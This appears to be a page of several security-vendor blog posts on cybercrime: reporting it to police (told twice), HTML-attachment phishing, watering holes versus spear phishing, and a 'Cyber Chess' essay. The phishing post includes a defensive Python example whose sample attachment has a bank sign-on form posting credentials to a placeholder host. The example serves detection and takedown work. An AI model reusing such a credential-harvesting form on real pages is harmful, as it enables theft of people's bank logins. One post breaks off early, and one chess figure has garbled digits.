Numbers of Victims of Cybercrime are Soaring

Reports from law enforcement agencies around the world show that there have been even more victims of cybercrime in the past 12 months than in any other year. Attacks are being conducted alarmingly frequently, and cybercriminals are becoming even more brazen. However, cybercrime is still not dealt with in the same way as other types of crime.

Say you leave home, only to return to your front door kicked in. Everything of value has been stolen. What would you do?

You’d call the police immediately, right?

Now pretend you get an email from what looks to be your bank. They inform you that your banking password needs to be changed. A link to do so is embedded in the email. The next time you log into your account, $1,000.00 is missing. Who would you call?

Most people would instinctively call their bank. But, why wouldn’t they call the police?

You should call the police first. After all, it is a crime. However, this is not how we typically approach online theft. Not only have I devoted my life to identifying and stopping cybercrime, but I’m a victim as well. My mission from the beginning has been this: I want to change people’s thinking about online theft.

On a trip to the grocery store, my card was declined for a small purchase. Knowing that there was more than enough to cover the bill, I contacted my bank only to find out that someone had gone to a Wal-Mart three times and spent $1,800.00 out of my account.

I called the police immediately. They only wanted to file a police statement so the bank would return the money.

The main focus wasn’t just getting my money returned. I also wanted to track down the criminal and put them in jail. However, the police didn’t seem interested. The crook lived in San Diego and I’m in Alabama. They would need to catch the criminal, fly him to Alabama, then house and feed him until the trial. The cost of these expenditures would far outweigh the $1,800.00 that was stolen.

Not satisfied with what I was hearing, I contacted the San Diego District Attorney. They informed me that they’d be glad to help as long as I’d sign an affidavit stating my wife or I would fly to San Diego to testify. Without a witness during the trial, the criminal would most likely be let go with no penalties. The cost of the ticket with room and board during the trial would have been more than the $1800 I had already lost.

I was unable to afford the trip, so I began fighting in a different way.

I began devoting all my time to tracking down cybercriminals and sharing the information that I found, in order to help people protect themselves.

I began to ask, “Why don’t we treat cybercrime the same as physical crime?” If someone breaks into your home and steals your TV, we blame the robber. If someone steals $1,000.00 out of your PayPal account, we blame the victim for not having sufficient firewall protection or prevention software. What’s wrong with this picture?

Why are these crimes not acknowledged or tracked by the government? In 2012 alone, there were 18 new victims of cybercrime every second. 9 million of those fell victim to fake banking websites. 19 million Americans had money taken off their credit cards without authorization. 43% of Americans are still the target of large amounts of spam.  Despite this, none of these activities are tracked by the Department of Justice.

While I continue the fight to inform people about cybercriminal activity and to change tracking procedures, what can consumers do to protect themselves? Consumers should monitor receipts, credit card statements and bank accounts. And, although this isn’t the way that things are currently handled, I believe in the mantra “If you see something, say something.” When consumers are victimized by cybercrime, they should call the police; if the police don’t respond the way that we all think they should, consumers should let their elected officials know by contacting their congressmen and senators. It needs to be known that we want justice against these crimes.

Learn more about my personal experience with cybercrime by viewing my recent talk on the TEDx Birmingham stage:

How did you get into the security industry? Was it a personal experience with cybercrime? Share your experience in the comments section below.

Phishing with a malicious .zip attachment

A few weeks ago, we received a round of phishing emails with malware that seemed a little more special than your run-of-the-mill ZeuS, so we decided to give it some analysis. The email was reported by a user at PhishMe. We really do drink our own kool-aid. Figure 1 shows a screenshot of the email that is being analyzed.

Figure 1 — Original Message

HTML Attachment Phishing: What You Need to Know

Are you aware of HTML attachment phishing? It is one of the latest trends among cybercriminals. Instead of emailing downloaders that contact C&C servers to fetch crypto malware, Trojans, or other nasties, HTML attachments are being sent. HTML phishing emails are less well known, and as a result, many people are falling for these phishing scams.

Even though this past weekend was a holiday weekend for many, there is a good chance that you still checked your email fairly often. If you are like me, you typically use your phone or another mobile device to check your email on the go. This past weekend, you were probably multitasking and may not have been on high-alert for a fraudulent message while you were checking email in between hiding and finding Easter eggs.

Hackers know these things.

So, they send crafty messages like this one (shown as opened in the Thunderbird email client):

If you open that message on your phone, the attachment would probably download with the message, and all you have to do is click to view it. This is a little different than your typical phishing message; a typical phishing message contains a button that has an embedded link that takes you to a lookalike of your bank’s or another online service provider’s real web site.

In today’s example, the phishing page has been stored as a file that looks like the following in a desktop browser:

It will also load up in your phone’s browser, but Safari (or another browser) on your phone may just show you a truncated version of the Internet address you are visiting. When it is a local file, you may just see a portion of the name of the file, Wells_Fargo-Personal-Business_Banking.htm as on my iPhone below:

So, what can Wells Fargo do about that? You may think there is no phishing content to be taken down or removed because it seems encapsulated in the email message. You may think that nobody is harmed if you don’t reply or fall for logging in this way. However, some folks WILL reply, and there is fraudulent content on the Internet that can be referred by Wells Fargo to their takedown provider.

In the source code of the HTML attachment are instructions for how to handle the credentials that the victim enters. Below is a snippet of the code from this phishing attack:

<form id="frmSignon" action="hxxp://" autocomplete="off" method="post" name="signon">

The highlighted portion is the path to a PHP script on a compromised server in Portugal that hosts a domain belonging to a Brazilian gospel video web site. Undoubtedly, if we could view the source code of that PHP script, we would see that it contains the email address of the criminal who is receiving the stolen Wells Fargo credentials. Wells Fargo wants to remove this fraudulent content before its customers can be victimized.

When we visit that page, we see that the PHP code redirects victims to what we call the “exit URL” which is a legitimate login page at Wells Fargo. The victim will then think that their login failed, and they will try to log in again. It is at that moment that Wells Fargo can recognize that customers who login there—having been referred from the URL—are customers who likely just gave up their authentication credentials and should have their accounts locked until the situation is rectified.
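The two steps described above (finding where the attachment's sign-on form sends credentials, then recognizing customers who arrive at the real login page from the kit's "exit URL") can be automated. The following is an added example written for this page, not PhishMe's or Wells Fargo's code: it carves the HTML attachment out of a constructed raw email, extracts the form's POST target host, and then scans constructed combined-format access log lines for requests whose Referer is on that host. Every host name, IP address and log line is made up (`.invalid` placeholders); nothing here is the real kit from the post.

```python
"""Added example (not PhishMe's or Wells Fargo's code): triage a constructed phishing
email that carries an HTML attachment, pull the action URL out of the attachment's
sign-on form, and then use that host to pick out web-server log lines whose Referer
points back at the phishing kit. All hosts, addresses and log lines are constructed."""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message. The attachment mimics a bank sign-on page whose form
# posts credentials to a script on an unrelated host (placeholder names, .invalid TLD).
RAW_EMAIL = b"""From: alerts@example-bank.invalid
To: customer@example.invalid
Subject: Important notice about your account
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

Please open the attached secure form to confirm your details.
--XYZ
Content-Type: text/html; name="Personal-Business_Banking.htm"
Content-Disposition: attachment; filename="Personal-Business_Banking.htm"

<html><body>
<form id="frmSignon" action="http://compromised-host.invalid/kit/login.php"
      autocomplete="off" method="post" name="signon">
<input name="userid"><input name="password" type="password">
</form></body></html>
--XYZ--
"""


class FormActionParser(HTMLParser):
    """Collect (action, method) for every <form> tag in a document."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            a = dict(attrs)
            self.forms.append((a.get("action") or "", (a.get("method") or "get").lower()))


def html_attachments(raw):
    """Return [(filename, html_text)] for every .htm/.html attachment in a raw message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if name.lower().endswith((".htm", ".html")):
            found.append((name, part.get_content()))
    return found


def credential_drop_hosts(raw):
    """Hosts that forms inside HTML attachments POST to.

    A sign-on form delivered as a local file that posts to a remote host is the
    pattern described in the post; that host is what a takedown request targets."""
    hosts = set()
    for _name, html in html_attachments(raw):
        parser = FormActionParser()
        parser.feed(html)
        for action, method in parser.forms:
            host = urlparse(action).hostname
            if host and method == "post":
                hosts.add(host)
    return hosts


# Constructed combined-format access log lines from the legitimate sign-on page.
ACCESS_LOG = """\
203.0.113.5 - - [20/Apr/2014:10:01:02 +0000] "GET /signon HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Apr/2014:10:02:15 +0000] "GET /signon HTTP/1.1" 200 512 "http://compromised-host.invalid/kit/login.php" "Mozilla/5.0"
198.51.100.9 - - [20/Apr/2014:10:03:40 +0000] "GET /signon HTTP/1.1" 200 512 "https://www.example-bank.invalid/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \d+ \d+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def referred_from_kit(log_text, kit_hosts):
    """(client ip, timestamp) for requests whose Referer is on a known kit host.

    These are the sessions the post says arrive via the kit's "exit URL" and
    should be locked pending review; lines that do not parse are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if urlparse(m.group("ref")).hostname in kit_hosts:
            hits.append((m.group("ip"), m.group("ts")))
    return hits


if __name__ == "__main__":
    kit = credential_drop_hosts(RAW_EMAIL)
    print("credential drop host(s):", sorted(kit))
    print("sessions referred from the kit:", referred_from_kit(ACCESS_LOG, kit))
```

The Referer check only works while the kit still redirects to the genuine page and browsers still send the header, so it is a supplement to taking the kit down, not a substitute; in practice the host set would be fed by the takedown workflow rather than by a single message as here.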

PhishMe provides the intelligence that enables Wells Fargo and other spoofed brands to tackle this threat vector. Our PhishMe Intelligence system scans over two million spam messages daily to identify the messages that are delivering HTML attachments. Then we use our patented technology to automatically identify the file as a phishing attack and extract the relevant intelligence.

PhishMe digs deeper than other threat intelligence service providers to find the source of the attacks.  Learn more about how we can help you protect your brand here

Watering Holes vs. Spear Phishing

How Does A Watering Hole Attack Work?

Watering hole attacks originate by compromising trusted websites and infecting the computers or other devices that visit that site. A successful watering hole attack casts a wide net and has the potential to compromise a large number of users across multiple organizations. This flood of information is a double-edged sword, as attackers have to parse through a large amount of data to find information of value. Additionally, these attacks often exploit zero-day vulnerabilities, so their increased popularity means attackers are burning through zero-days faster, and companies are responding faster as well, stopping attacks earlier in the kill-chain.

These attacks are an effective tactic that, when executed properly, can deliver widespread damage on a large scale. Symantec released an excellent report describing the APT group “Hidden Lynx”, who the report describes as the inventors of the watering hole technique. The report details last year’s VOHO campaign, which targeted iOS developers, and impacted users at Facebook, Apple, and Twitter – showing the power of a watering hole attack.

The Danger Of Indiscriminate Watering Hole Attacks

Instead of viewing indiscriminate watering-hole attacks as a replacement for spear phishing, they can be seen as an additional tool at adversaries’ disposal, which is what makes them so dangerous. Like all tools, spear phishing and watering hole attacks have specific strengths and weaknesses that suit them well for certain jobs while making them limited in other situations.

As described above, watering hole attacks gather huge amounts of data that attackers will have to sift through for useful information, thus slowing down their ability to take additional malicious action.

Spear phishing, on the other hand, offers attackers the ability to focus more on specific targets and information. A successful spear phishing attack provides immediate access to a target’s systems. Given the amount of readily available information on organizations and their employees on the Internet, attackers can easily identify targets and craft seemingly genuine emails that will provide gateways to specific systems and ultimately data. Spear phishing can exploit zero-days to drop malware on a host, but it doesn’t rely on vulnerabilities. Simple social engineering tactics have allowed groups such as the Syrian Electronic Army to carry out a multitude of high-profile attacks.

“Spear phishing offers attackers the ability to focus more on specific targets and information.”

Anecdotal evidence continues to highlight spear phishing as the source of most high-profile breaches. As previously mentioned, spear phishing is the attack method of choice for the Syrian Electronic Army. Brian Krebs also reported that the Target breach started with a spear phishing email that unloaded malware and stole login credentials from Target vendor Fazio Mechanical.

The fact that news reports around watering hole attacks are stating “watering-hole usage” rather than “company x compromised by watering hole attack” indicates that either companies aren’t discussing successful campaigns, or that the attackers are still refining their tactics. Even if they are successful, the attackers may be inundated with information and are still deciding whether they have found anything useful.

There’s no denying that watering-hole attacks are making an impact, but the idea that it is replacing spear phishing is erroneous. While Symantec’s 2014 Internet Security Threat Report notes a decrease in the overall volume of spear phishing emails, the number of campaigns increased by 91%. Adversaries aren’t turning away from spear phishing as an attack method; instead they are sharpening the focus of their attacks. Symantec attributes this to growing user awareness (we’d like to take some credit for that), but it is probably also due to the dynamics discussed above.

For casting a wider net intended to compromise a large number of users, watering-hole attacks are an effective tactic, but for a highly focused attack seeking specific information, a well-crafted spear phish is still an adversary’s best weapon.

Cyber Chess: How You Can Win

Most of us are not very good at playing chess – if we play at all.  However, many of us at least have some familiarity with the game. The following quick description will help in the discussion of Cyber Chess – the game the good guys (white pieces) “play” against the cybercriminals (black pieces) as they try to steal anything we value from our cyber world.

The chess game is described in three phases.

The Opening:  During the opening, you and your opponent make several moves to establish a battlefront.

The Middle Game:  The middle game is the direct battle zone. This phase is spent attacking, being attacked, defending and looking for ways to stabilize your defenses or cripple your opponent and break down his/her defenses.

The End Game: This is where the game comes to a conclusion when, excluding the occasional draw, you either win or you lose to your opponent, Checkmate!

Simple enough, right?  And it is, all you have to do is checkmate your opponent – i.e., capture their king more or less. Of course, there are those who would argue that it is not that simple. They say you have to be really smart and know a lot! They point to the fact that for just the first four moves in a chess game, there are 318,979,564,000 possibilities. For the first ten moves, the number is 169,518,829,100,544,000,000,000,000,00. After that, the numbers start to get big, with the total possible moves in the neighborhood of 10^120 or 1 followed by 120 zeros – quite a big neighborhood!  Hmmm, maybe they have a point.

Chess is a game of extremely big numbers of possible moves. Cybercrime is a “game” of very big numbers.  Annually:

  • 26,280,000,000,000 malicious e-mails sent
  • 2,628,000,000,000 get through current defenses
  • 13,140,000,000 are effective

To be clear, Cyber Chess is not “a” game. It is thousands and millions of concurrent games rolled into a continuous stream of threats to which we must respond – in other words, we must “play.”  So, the answer to the “Do You Play?” part of the title question is yes, you do play.  You may not want to play, you may not know how to play, but like it or not, you are definitely in the game!

The Cyber Chess opening begins with criminals sending out nearly 75,000,000,000 malicious messages (spam, phishing, malware) every day. Your opening moves are probably to make sure your antivirus (AV) software is updated and that your various network devices are current with respect to known threats.  Assessment of the opening game:  Advantage Black.

The middle game plays out with your defenses blocking what they can and with the cybercriminals taking what they can get in terms of successfully getting into one or some of your users’ computers and then into your network.  Using an industry average figure of 1 in 200 attacks being successful, and assuming your company has maybe 1000 users, that means that on average 5 of your users will fall victim to an attack that made its way past your defenses.  Of course, all it takes is one successful compromise to allow the criminal to take up residence inside your network. Does this really happen that often considering the money companies spend on cyber defense? If you ask Target, Neiman Marcus, Franciscan Health, dozens of universities, and hundreds of other companies, it absolutely does happen!  From the 2013 Verizon Data Breach Report:

  • There were more than 47,000 security incidents reported
  • Resulting in 621 data breaches
  • Email attacks were the primary mechanism to deploy malware into enterprises, either directly or indirectly (Figure 20/pg 29 of the report)
      • 67% of the time in large enterprises, email was the direct vector
      • And still more often, malicious email was the mechanism by which bad guys gained access to a computer and then directly installed malware on it
  • Of the 621 data breaches, how did companies find out? (pg 54 of the report)
      • Only 4% were detected by Network IDS (Intrusion Detection Systems)
      • Only another 4% were detected by analyzing log files
      • Anti-Virus programs didn’t detect any of them!
      • Most companies learned about their data breach from an external source
          • Examples: customers, law enforcement. This happened 70% of the time (pg 53 of the report)

It is also interesting to note that the average time between when a breach occurs and when a company detects it has been breached is about 210 days (Trustwave). That’s a long time that the criminal has to develop his or her “middle game,” solidifying their presence in your network and positioning for a win in the end game.  Of course, they are taking your “pieces” all along the way.

Significant in all of this is that according to the Verizon report, none, zip, zilch, nada, of the breaches were detected by Antivirus programs. That is truly comforting news – for the cybercriminal.  Assessment of the middle game: Advantage Black

The End Game.  Unfortunately, there is no end to this game, at least not an end that anyone can foresee from the present state. For a long time, we will be forced to play the middle game in response to a continuous assault of opening moves by the bad guys.  Can you play the game using yesterday’s tools and yesterday’s strategies and tactics?  Absolutely you can!  Can you win the game doing that?  Absolutely you cannot!

Cybercriminals continuously evolve their tools and tactics to improve their success based on what they learn about their enemy, about us. Theirs is an intelligence-based approach, and when they see that something is not working, they make changes.  Too many of us continue to put our faith in things that might have worked in the past, but that we know, in our minds and hearts, are no longer effective.  Why is that so?  For one thing, antivirus companies continue to sell the message that they protect us from bad things, and they do. The problem is that they do not protect us from the worst things, and even when they finally do, it often is too late.  The other problem is that for such a long time, we have been conditioned to think in a compliance-based way: if we follow the rules and regulations, do what we have been doing, and use the updated versions of yesterday’s weapons, we will be okay.

The question to ask at this point is “How is that working for us?” Given that daily reports of breaches would fill several pages of the daily newspaper, the honest answer has to be “Not very well.” A casual review of the 2013 Verizon Data Breach Report already gives us the answer.  The new question is “What can we do to get better at the game and have some hope of eventually winning?”

The new answer is that we must shift away from believing the well-intended but misguided idea that others can protect us with outmoded tools while we blissfully go about our business.  We must realize that today’s solutions to today’s criminal attacks are found in actionable intelligence and proactive intervention.

What this means is that we must employ actionable cybersecurity intelligence and forensic analysis about email-based threats (phishing, spam and malware) that identify, prioritize and target cybercriminal activities and provide effective countermeasures. This includes the ability to identify the root sources of cybercrime attacks (servers, perpetrators, locations, etc.), obtaining rich actionable intelligence information about cross-brand attacks and targeted attacks, as well as advanced notification of emerging email-based threats.  Only then will we be able to respond effectively to attacks on our brands, and to disrupt email-based threats against us.  Only then will we be able to improve our game.

Cyber Chess – Do You Play?  Yes, you don’t have a choice.

Can you win?  Perhaps, but not by continuing to play yesterday’s game.

Assessment of the end game: It’s up to you.  Your Move!

Why Do We Treat Cybercrime Differently than Real-Life Crime?

What would you do if you were the victim of a crime? For example, what if you walk out to your car after work and find the window smashed and the stereo stolen? Wouldn’t you call the police?

Imagine that, this weekend, you’re leaving a bar with some friends. A man walks up, points a gun at you and demands your wallet. You’d call the police, right?

Now pretend you receive an email saying that the bank needs you to reset your password. You go to the provided website in the email and the next time you check your balance there’s $500 missing. Who would you call?

The bank, right?

Our first inclination is to call the police when we’re the victims of crime in real life. Why do we treat cybercrime differently than any other type of crime?

When it comes to punishing cybercriminals, the biggest obstacle is that they’re usually too far away from their victims. Even if they’re caught, the court fees, travel expenses to the court, and lodging normally outweigh the amount stolen. It’s easier to just call the bank and try to get your money back. While this isn’t exactly “right”, it’s currently the easiest course of action when dealing with online theft.

Another problem is how the general populace treats cybercrime. When a victim’s front door is kicked in and their house robbed, we immediately blame the criminal. When your online banking information is stolen, we typically point the finger at the victim and scold them for not having the most up-to-date antivirus software or firewall.

In terms of reporting criminal activity, the government does have laws that say we should report every crime to the Department of Justice. Crimes like burglary, aggravated assault, and murder are measured. They do not measure cybercrime. There’s not even a box to check in regards to online theft on a police report.

So why are they not tracking that? Statistics show that there are 18 new victims of cybercrime every second. In 2012, nine million Americans fell victim to fake bank websites, 19 million Americans had money taken off their credit cards without authorization, and 43% of Americans are still experiencing heavy volumes of spam. These seem like pretty steep numbers to not take into account.

In order to change this, we need to embrace the idea that if we see something, we say something.  When cybercrime happens, call the police. If they don’t respond the way you think they should, notify elected officials about the crime. Take the issue to congressmen, senators, governors, DAs and the Attorney General. It needs to be known that we want justice against these crimes and it needs to start with the victim.

How do you think that we can improve enforcement around cybercrime? Share your comments below.

Learn more about this topic by watching Gary’s presentation at TEDx Birmingham here.